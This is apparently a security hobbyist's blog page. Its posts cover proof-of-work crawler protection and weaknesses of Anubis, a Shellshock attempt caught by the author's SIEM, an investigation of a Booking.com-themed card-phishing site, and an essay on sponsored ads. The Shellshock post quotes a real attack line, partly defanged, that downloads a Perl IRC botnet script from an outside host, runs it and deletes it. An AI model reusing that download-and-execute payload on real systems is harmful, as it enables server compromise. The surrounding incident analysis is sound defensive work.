Skip to main content

Ideas for Proof of Work crawler protection

A few ago I wrote a post about Anubis in which I called it kinda crap but fine. Of course my brain didn't shut off after that so, uh, here are some thoughts on how one could solve some of the issues of the proof-of-work approach Anubis uses. I am sure there is prior literature & I am just reinventing the wheel but I wanna see how far I can get on my own (with the design for now, I can't program for shit...).

In the previous blogpost I highlighted the work imbalance by the approach Anubis uses - provide a proof-of-work solution once, get a cookie, do all the requests you want within a multi-day time period. Or in other words: required work does not scale with amount of requests. If you intend to keep the site useable for flesh-and-blood users crawlers don't really pay a high cost either. Unfortunately you can't really limit the amount of calls with one token either (withouth going stateful, ew)... so what if we just required constant proofs instead?

Basic design

Let's say a client is requesting $url. To access that ressource the client also needs to provide $solution so that $solution != mod($url) & hash($solution)[0:n] = hash(mod($url))[0:n] where n is a measure of difficulty, hash is some hashfunction, and mod is a modifying function for the URL - what it will need to do depends how we solve some issues below.

How do we get $solution to the gateway? Cookie might be possible but seems messy, same for body (oh god, I don't want to think about the packing/unpacking magic required for protecting POSTs...). I am seeing two options: Headers and queries.

Headers would be kinda neat because it doesn't require modifying the URL, you are however running into the issue that providing pre-validated links on other websites require JS. This probably isn't a KO criterium, though it will require some extra engineering for requests with a body coming from other websites.

Adding $solution as a URI query parameter feels a bit messy at first. First, it is user-visible which... eh. Second, it either requires removal of the parameter in mod or $solution becomes self-referential - this shouldn't technically be an issue but ... is kind of a mindfuck. But it has one major benefit: It doesn't require messing with the actual requests per se, you can just link to $url[?/&]solution=$solution directly. It's probably the approach I'd prefer.

Restoring Useability

Eh, so, all of that is nice but we just took useability out back and put a bullet through it's head, in two different ways - maybe more I haven't found yet: First, loading a site with subressources (idk, js, css, embedded images, ...) isn't gonna work or gonna use a lot of work. Second, you'll get the cute anime Egyptian god pop up & make you wait every time you click a link.

Subressources

We can solve this multiple ways.

First one is kinda lazy: Only require proof-of-work for specific ressources, making the proof-of-work implicit. Wanna access something in /assets/? Sure, go ahead. Wanna access something in /posts/? You better do the homework. The idea here is that there are either ressources that are not very protection-worthy (e.g. the css for a generally available SSG preset) or only accessible through protected ressources (e.g. images embedded in or linked to by protected pages). Important note though: This does not provide any protection against crawlers attempting to enumerate directory contents in unprotected directories directly.

The second one follows the same idea but attempts to provide protections against enumerations: Solutions for subressources are pregenerated on the server & already included in the HTML/JS delivered to the client. This... is messy and may completely fall apart if you are using external JS or whatever... . Not a fan.

Third option ... is kinda my favourite but also infeasible in most cases: If you have a good mapping which ressource is being used by which page we could use the referer header for implicit proof. Sounds like a lot of work and may again allow for certain enumeration-based bypasses.

Honestly, lets just go with the first.

Conclusion

I don't think I can implement this. I have no experience with webshit... at all so I am probably overlooking shit. If you find some issues please let me know though, I'd love to learn what I failed to consider!

Anubis & Obscurity

You may have come across Anubis over the last few months - a WAF, of sorts, that uses automated challenges to filter out misbehaving web scrapers.

It's kinda crap. But that's fine & it's also kinda cool!

Why it is required

There is plenty of "bots" out there & they aren't all bad. A mastodon instance checking verified links on your profile? That's a bot. A social media tool generating previews for a link? That's a bot. The Internet Archive? That's a bot.

Web client accessing a ressource will generally indicate their identity using a User-Agent header. Browsers user agents are... weird. What's relevant for us here is that browser user agent strings generally start with Mozilla/5.0). Bot user agents should generally be pretty simple, by comparison: botname/version (some additional info). Additionally bots should follow the robots.txt if it exists, a file hosted in specific locations on a webserver that will tell bots what they may or may not access. This can be pretty granular, including having different rules for different bots, request frequency limitations, ...

... except all of that is just convention, there is no enforcement. Bots can just ignore the robots.txt. Clients (incl. bots) can just set any user agent they want & many of the more misbehaving bots do. A common user agent to immitate would be common browsers.

How Anubis attempts to solve this

This is just a high-level description of Anubis, I will skip elements of it if I don't think they are relevant to this discussion. If you want all the details: Here are the docs

Anubis, by default, only attempts to filter out extremely misbehaving bots, those that impersonate (or are!) browsers. For this Anubis check the User Agent - if it doesn't start with/include Mozilla you get a free pass. This feels quite paradoxical at first as Anubis explicitly doesn't block bots presenting as bots.

After that Anubis issues a challenge, a small piece of JS implementing a mathematical problem that's hard to solve but where a solution is easy to check. Once the client sends a correct response Anubis issues a signed cookie which the client can use to bypass future inspections.

That's it.

Why this is kinda crappy

Trivial bypass

Ok, you are a misbehaving bot, pretending to be a browser. You approach the webserver, get told "lol no"... what do you do? Well, just make the request again but this time using any other user agent. Bam, you are in.

Work imbalance

Anubis is (largely) stateless, from what I can tell. This is kinda neat from a lot of perspectives - all information is maintained in the signed token, no database required on the server. But this also means: Tokens are valid for a certain period, not a number of requests.

Why does this matter? Should any bot obtain a valid token they can scrape the entire website without further checks.

This creates an interesting imbalance: Legitimate users (maybe visiting a handful of pages) have a much higher proof-of-work cost per request than bots & the larger the site to be scraped the more the per-page cost diminishes.

Oh, and from some very ad-hoc testing the in-browser JS codes is pretty unperformant, compared to some hacked together python script.

But does this matter?

And yet Anubis is fine - it will keep out the dumb & malicious bots at a very low cost. Implementing a challenge solver takes effort. Solving them will add up over time if you are scraping billions on websites. Even implementing a Anubis detection & user agent based bypass takes effort. And if you really want to bring down the hammer you can disable user agent checks. And all that for a few CPU cycles on the server & your user end - most of the time I don't even notice the Anubis challenge pages anymore. Oh, and maybe breaking the Internet Archive bot...

But Anubis can not become successful, it must stay a niche application. Should it ever become successful "attackers" will adapt, will exploit those weaknesses... because this is Security by Obscurity. Anubis works by being weird, unexpected, and small. The proof-of-work is secondary. I am not going to go as far as calling it theatre, I don't have the data to proof that. But no motivated attacker will be stopped by it.

Hm, actually, good question, how effective is Anubis compared to a simple "here is a cookie, now do a refresh" JS starting page?...

Obscurity is fine

And again, that is fine. Obscurity can absolutely be part of a defensive strategy, reducing load, reducing noise, keeping out the dumb-as-rocks attackers so you got time & ressources to focus on the ones that matter. Be that in security operations or in the number of cpu cycles you got available on your webserver.

Offtopic

Anyway, this was all a very long winded way of setting up an explanation why my employer should move away from firstname.lastname@domain.tld for employee email addresses because jfc, if someone in middle management asks me ONE MORE TIME how spammers know their email address & I need to ask them "do you have LinkedIn"... .

How about firstname.lastname.random3digitnumber@domain.tld?

Who do you think will kill me first? Messaging team or business?

Short: Shellshocked!

Just a short one for now: Tonight I received a maximum severity alert from my SIEM, one of my internet-facing webservers received a shellshock attack! After a quick check for successful exploitation (not that I could see) I went back to sleep.

This is what was attempted (except not defanged, duh):

Timestamp: 2025-06-14T01:23:07+0200
Source IP: 104.131.118.62
Action: GET /nagios/cgi-bin/status.cgi HTTP/1.1
User Agent: () { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnZAZAZA\x22';system(\x22wget -O /tmp/gif.gif http[://]pjsn[.]hi2[.]ro/gif.gif;curl -O /tmp/gif.gif http[://]pjsn[.]hi2[.]ro/gif.gif; lwp-download -a http[://]pjsn[.]hi2[.]ro/gif.gif /tmp/gif.gif;perl /tmp/gif.gif;rm -rf /tmp/gif.gif*;exit\x22)

Or in human: Use the useragent to do the (){ :;}; thing, print something in perl I haven't fully made sense of yet, system to download a file (three different ways, depending on what downloader is available), execute the file as a perl script, then clean up behind yourself.

I just want to point out though: I think this is broken in multiple ways?

  • Closing single quote for the perl -e does not include the system when it should?

  • curl usage of the -O flag is incorrect here, definitely made that mistake myself though.

I downloaded the file manually, you can find it here. ZIP password is ENqHNXX2JM0w. It presents itself as "DDoS Perl IrcBot v.10 / 2012 by w0rmer Security Team", a "Stealth MultiFunctional IrcBot written in Perl". I hate Perl. Thankfully it has a disclaimer "Created for educational purposes only. I'm not responsible for the illegal use of this program". Good to know!

I'd throw some IOTs on OTX but, like, half them are whitelisted, not gonna bother for now...

Hotels I won't visit

I recently got my hands on a sample of a phishing campaign. Pretty boring one, fwiw, "just" trying to steal personal + credit card data, but still felt like doing a bit of digging. Here are some findings.

While I will share domains & url patterns I will not share full URLs as the associated pages contain personal data (esp. names) of targets. If you have a need for the full urls feel free to reach out to me.

I will not be able to share the original sample email.

The email

I received my sample email(s) from someone who had recently booked a stay with a specific Austrian Hotel (Hi5-Hotel) through Booking.com. At a later point (2025-06-01) they received a notification from Booking.com about the need to provide additional information, otherwise their stay would be cancelled, with the hotel being named as the sender.

Reviewing the mail itself it looked technically clean, actually coming from a Booking.com subdomain & passing SPF. I will not even include any IOCs for the email itself here as I am rather certain this is, technically, a legitimate email.

The link in the body, however, was highly suspicious: https://hi5XXXX.gstlly.com/ (with XXXX being four random lowercase alphabetic characters). By the time my recipient interacted with that email (2025-06-02) the specific domain had already been flagged as malicious in a security product in use by the recipient, so no damage was done in this case.

Booking.com partner compromises

Booking.com has a problem: It partners with millions of properties. This makes it a certainty that a good number of their partners will have security incidents on a regular basis. While Booking.coms infrastructure is likely not at significant risk from this their customers are: Enterprising attackers can compromise the Booking.com accounts of partners, steal customers data, and send notifications to customers using legitimate notification channels.

I am rather certain this is also what happened in this case, given we had a technically clean email, knowledge about the hotel this person was staying at & the correct dates.

This unfortunately makes recipient-side filtering... is rather tricky, not that I think it should be on the recipient, this is on you, Booking.com.

The website

One thing I found initially fascinating is the URL/Link provided in the email (https[://]hi5XXXX.gstlly[.]com/): No, there was nothing missing there. It just is / as the path, no parameters, no nothing. Yet when following the site (in a sandbox) it prefilled the recipients data. This means: There are individual domain names for individual targets! I have no idea why, tbh. My first theory was that this allows for identifying ... delivery or analysis based on DNS queries, even if parameters get stripped?

But that doesn't really make sense given that the entire thing is hosted on Cloudflare anyway, including using CF nameserver. So I don't know, if you got ideas lmk.

Anyway, the site immediately 302-redirects the user to https[://]booking.confirmation-id91753[.]com/YYYYYYYYYY where YYYYYYYYYY is a 10-digit number. This 10-digit number maps to various details of the stay, including property, date, names, price. Interestingly the name is not always pre-filled.

The destination page mimics the style of a Booking.com website reasonably well & is prefilled with the above mentioned information. The visitor is asked to provide some additional data such as an Email & Phone number.

Tor Browser Screenshot of the above-described website. In this case the hotel is the Aalesund City Apartment, with the address being given in cyrillic. The name and surname, as well as the ID in the address bar have been blacked out.

Once that information has been provide the website lets you proceed to https[://]booking.confirmation-id91753[.]com/C3REEV2V5/ for credit card harvesting. Here the path is the same for every victim, target information is maintained in a cookie, again using the 10-digit number from above. The visitor is asked to enter Credit Card information, including Cardholders Name, Card Number, Expiration Date, and CVC. You are even given the option to opt-in to marketing emails, nice touch!

Tor Browser Screenshot of the above-described credit card harvesting page. The hotel is still the Aalesund City Apartment. No CC data has been filled in.

After filling in CC information the visitor is being forwarded to a holding page & told, both by the site & the support chatbot box, to please wait while the CC data is being checked. The path is again universal to all targets (https[://]booking.confirmation-id91753[.]com/EC1G5P8X9/), victim specific data is maintained as cookies & in the request itself.

This is where, I assume, the magic happens - the page loads for a few minutes while the backend presumably attempts to conduct some light financial crimes with the given CC information. As I gave it some fake CC data I am unfortunately unable to confirm this but I am only going to put in so much effort into this.

If the CC validation fails the visitor is being send back to the previous page, asked to enter new CC information.

Tor Browser Screenshot of the above-described website. The site shows a box with big VISA & mastercard logos & the headline "point of sale - booking". Some data is shown below, incl. the current date & the last four digit of the CC number. Below a spinning loading wheel & the text "Your transaction is being processed. This may take some time." is being shown. To the side a "support" text box has popped up, telling the visitor in English that the information has been received & verification is in process. The visitor is instructed not to leave the page & the visitor will be informed once this is done.

Overall a pretty clean website, ngl, pretty believable if you dont look to closely.

If an "ununsed" page is loaded all you get is a "AD not found (captcha2)" page which feels like it could be turned into identifying the underlying stack but appears to be pretty much completely GenAI generated, given the amount of unnecessary comments in the code.

Unfortunately the page, in general, doesn't yield a lot of other information I could find - used ressources appear to exclusively be hosted on the same domain, with a minority being loaded from central CF servers. As mentioned above, the default failure page appears to be GenAI generated. Comments are in Russian. There are also a few other places in the website that point to a Russian-language preference of the creators, incl. some CF links pointing to the ru-ru version of pages. The chatbot, which... isn't really functional most of the time, also has a tendency to default to Russian if unexpected non-language inputs are given.

Other than that the site itself is pretty non-descript to my untrained eye. Doing some searches on code snippets shows that this exact website code & design has been used since at least February 2024 (Urlquery example). That gives me an opportunity to go for the scheduled CF rant though...

Cloudflare

Recently, on a podcast (not sure if Risky Business or Defensive Security), I heard someone describe something as:

Cloudflare, but for criminals

That's redundant. Cloudflare is the Cloudflare for criminals. It has been a week since this page went live & at least 6 days since at least some security products classified this page as malicious. Cloudflare has hosted (and at times taken down) this exact malicious site 5 times over more than a year - and that's just the stuff I, an idiot, can find. At some point you'd think you'd just implement spot-checks on the code served against 1-to-1 matches against known-malicious sites, right? Or check on newly created sites as the number of scanners on VT climbs?

No? Oh well, at least the captcha stays up so sandboxes & scanners have a worse time, good job CF! At least your product doesn't lock me out from still scraping identifying valid 10-digit IDs & domains because here indicators still leak through!

Languages

So, small fun element, the site allows you to select languages - one that is missing is Ukrainian. Checking the code... the div for Ukrainian is still there! Just... commented out?? I am just going to imagine this as a case in which the compliance team told the devs to take it out because technically that would be customers & "we can't have Ukrainian customers, we are at war with them!". I don't care if thats the truth, it's the funniest option!

Update: Aging out & variants

So, as I am writing this I am noticing some IDs are no longer valid (apparently on a per-hotel basis?) & I found at least one hotel where a different path is followed (immediate collection of credit card information)? Not gonna hold this back longer though...

Scraping

Because I didn't just want to look at a trainwreck but actually do something semi-useful I went ahead & tried to identify impacted hotels. For this I used Hi5 as a starting point & enumberated the entire 4-character subdomain space. This was quite trivial as the HTTP status code immediately yielded success/failure: 444 for a miss, 302 (with a Location Header) for a hit.

This gave me 165 10-digit IDs & I noticed that these were quite closely grouped, none below 1720637422, none above 1748504819. This means that the density may be in the realm of doable for some random scraping.

Here, unfortuantely, the status code was 200, no matter of hit or miss. Fortunately the HTML expressed easy-to-identify hit/miss & it was even possible to obtain (noisy) information about the respective property. This was ... honestly ideal for me, I don't even get send personal data on the targets but still get the hotel name. Neat!

Some hideous BeautifulSoup4 code & 500k random IDs from the range later I had 400ish IDs for 70ish properties. This is definitely not all of them but with my terrible code this was already an entire evening. A (noisy, non-clean) list of the properties can be found here.

Reporting

So, let's do something good & actually report this.

Fortunately the site is already on the Safe Browing & similar shitlists so that's already done.

Cloudflare reports suck as usual but the John Johnson report is out, not that I believe they'll actually do much... . As Cloudflare is Cloudflare I can't report all of this at once (only one fqdn per report, great, thanks) so I just send a report for the final domain, not the gstlly one & mentioned gstlly in the comments.

Finally, Booking.com. I don't have a particular hate for their IT teams so I feel kinda bad for the reporting path - unfortunately I am unable to submit a report through their webforms as I am neither a customer nor a partner. This feels... kinda bad? While they have a security.txt it only mentions their HackerOne & their appsec email address. This doesn't fall under either but I can't not report it so... yeeeet, it goes to the appsec email, with an explicit apology & explanation.

Let's see what comes from this, I am sure booking.com already knows this one by heart... .

Update: Fuck me I guess?

Email was bounced by proofpoint because my email server is running on a VPS & fuck an open internet infrastructure I guess. Every god single step in this process supposed security products have made things worse for me & easier for the bad guys, with the notable exceptions of forward proxies & blocklists. Email filtering failed on the phishing mails, TOC failed when my user clicked the linked, Clownflare made scraping unnecessarily difficult without detecting they are hosting known malicious shit & having a shit reporting process, now we get yet another email security company slowing things down. Yay.

Do you know where your sponsors are?

tl;dr: I believe that Content Creators have a responsibility for all sponsor claims they make & repeat. If they can not do that they must not advertise outside their area of expertise.

Ads & Waffengleichheit

I do not like advertisement. It wastes my time, it wastes customers money, it is annoying, yada yada yada. Not much new here.

But it also is unfair. The person I first heard this idea from (working in customer retention) saw a fundamental issue in the "Waffengleichheit" (German, lit. "equality of arms"), the idea that on the one side we have professionals using decades to centuries of industry research & the ressources of sometimes multi-billion companies, on the other side some individual just trying to live their life while being under near-constant bombardment by product propaganda.

With this unbelievable asymmetry an individualistic defense is simply not possible. Even if you yourself may consider yourself defended against this propaganda (you aren't!) I believe that society has a duty to defend it's vulnerable, not accept a status in which but the strongest can succeed. As advertisement is not going anywhere anytime soon this means: Controls, limits, and checks are required for advertisement, to at least curb the worst excesses.

Platforms & Content Creators

This includes a moral imperative for advertising platforms to control the 3rd party ads they run. This has been discussed to death for big platforms (advertisement networks, media platforms be it legacy or digital, social media platforms, ...) & I have no hope for actual change here in the current political climate. But you know who else is a platform? Influencers & content creators.

Where is the difference between your favourite youtube host taking a break from the videos content to talk to you about NordsharkVPN & the NCIS episode being interrupted to show you an ad for ... idk what ads run on TV these days, I don't even know if NCIS even still exists. There is no difference, it's in-stream advertisement probably unrelated to the topic & paid for with money.

Actually, that's not true. There is a difference:

  • I know the youtube host reading the lines. I probably value the hosts opinion. I may even be watching this very video to obtain factual information. There may even be a smooth transition from the video to the ad, sometimes funny.

  • I do not know the TV ad reader. I have no emotional connection to them. There (generally) is a clear break between the TV show & the ad break, not some "You know what else...".

This direct involvement makes content creators as ad platforms powerful. While parasocial relationships are risky & despite my misgivings about advertising in general this is not necessarily bad: Creators have a tighter relationship to & higher dependence on their consumers than (legacy) media networks, trust is a valuable commodity & incentive. In theory.

But this involvement also makes them responsible.

VPNs & false advertisement

This isn't just about VPNs. You can probably write this exact article about razers, mattresses, earbuds, underwear, data deletion services, meal replacements, ready made meals, nutritional supplements, ... . Oh god, let us not talk about coupon browser extensions.

Sidenote: I am looking forward to future historians dating media records from the current century based on the product category & brand name of the month.

But VPNs is something where I can somewhat claim expertise & as such call the most common versions of the ads misleading to just false, with the benefits from & need for VPNs being majorly overstated & associated risks being completely absent. I won't go through that here, this again has been discussed to death. I am also not going to get into the question if you should use a VPN. For this post I just care about the false advertisement.

It doesn't really matter where the false claims originate, be it with the product itself, some advertising agency or the creators themselves. It has been spoken in the creators voice.

Responsibility & Expertise

To which degree one should hold people & orgs responsible for mistakes is a complicated topic & there is no general answer. I generally believe that blame for individual human errors is mostly a bad idea & such cases should instead be used to identify & eliminate causes.

Sidenote: This has had me in the past clash with management at work about secret management & systemic failures, but that is a future blogpost...

Procedural negligence is not that.

Not checking the truth of the words you speak for someone else for money, as your income stream, is procedural negligence.

In a lot of criticism I read & hear about this there often is a disclaimer along these lines:

And I do not blame creators for whom this is outside their area of expertise, they can not know better.

I disagree. Yes, individual human mistakes may be made more likely by subject matter expertise. But this doesn't absolve the creator, this shows a hightened level of procedural negligence, in which the creator fails to compensate for their expertise. This is a structural failure.

Could I write a truthful ad for a VPN solution? I think so, yes. It may not make the VPN provider happy. Creators like Tom Scott have been walking an interesting line here, showing this can be done[1].

Could I write a truthful ad for a nutritional supplement? Not without significant research & consulting subject matter experts. This requires time & effort & potentially even incurrs monetary cost.

[1]: fwiw, I will hold this against him & other SMEs nevertheless. While these ads themselves do not contain falsehoods they serve to legitimize providers who otherwise use false advertising & whitewash their image.

I am not going to blame a creator that chooses to incur these costs & fails in the research - individual error, see above, but this should bring them to reconsider if they should operate outside their area of expertise, especially for topics where good resources on these issues are widely available. The issue of lacking Waffengleichheit applies here, too: Smaller content creator teams may not have the capability to check the information provided to them by a professional team of bullshitters who have been flooding the internet with misinformation for years. This doesn't just apply to the consumers.

I am, however, going to blame creators that choose not to incur these costs while taking the money. You are making this your own words. They are your responsibility. You are willingly neglitent.

Closing notes

What originally got me thinking about this was Reject Convenience, especially his Youtube videos. They are pretty good, overall, especially as starting points for frameworks for discussion of privacy topics with non-experts.

This post was written while listening to MASTER BOOT RECORD - IP. It's ok, probably not gonna relisten.